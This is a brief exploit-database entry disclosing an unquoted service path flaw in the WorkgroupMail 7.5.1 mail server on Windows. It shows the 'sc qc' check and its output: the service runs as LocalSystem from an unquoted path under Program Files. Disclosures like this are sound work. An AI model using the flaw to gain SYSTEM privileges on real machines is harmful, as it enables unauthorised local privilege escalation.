Share
## https://sploitus.com/exploit?id=PACKETSTORM:154903
# Exploit Title : WorkgroupMail 7.5.1 - 'WorkgroupMail' Unquoted Serive Path  
# Date : 2019-10-15  
# Exploit Author : Cakes  
# Vendor: Softalk  
# Version : 7.5.1  
# Software: http://html.tucows.com/preview/195580/WorkgroupMail-Mail-Server?q=pop3  
# Tested on Windows 10  
# CVE : N/A   
  
  
c:\>sc qc WorkgroupMail  
[SC] QueryServiceConfig SUCCESS  
  
SERVICE_NAME: WorkgroupMail  
TYPE : 10 WIN32_OWN_PROCESS  
START_TYPE : 2 AUTO_START  
ERROR_CONTROL : 1 NORMAL  
BINARY_PATH_NAME : C:\Program Files (x86)\WorkgroupMail\wmsvc.exe -s  
LOAD_ORDER_GROUP :  
TAG : 0  
DISPLAY_NAME : WorkgroupMail  
DEPENDENCIES :  
SERVICE_START_NAME : LocalSystem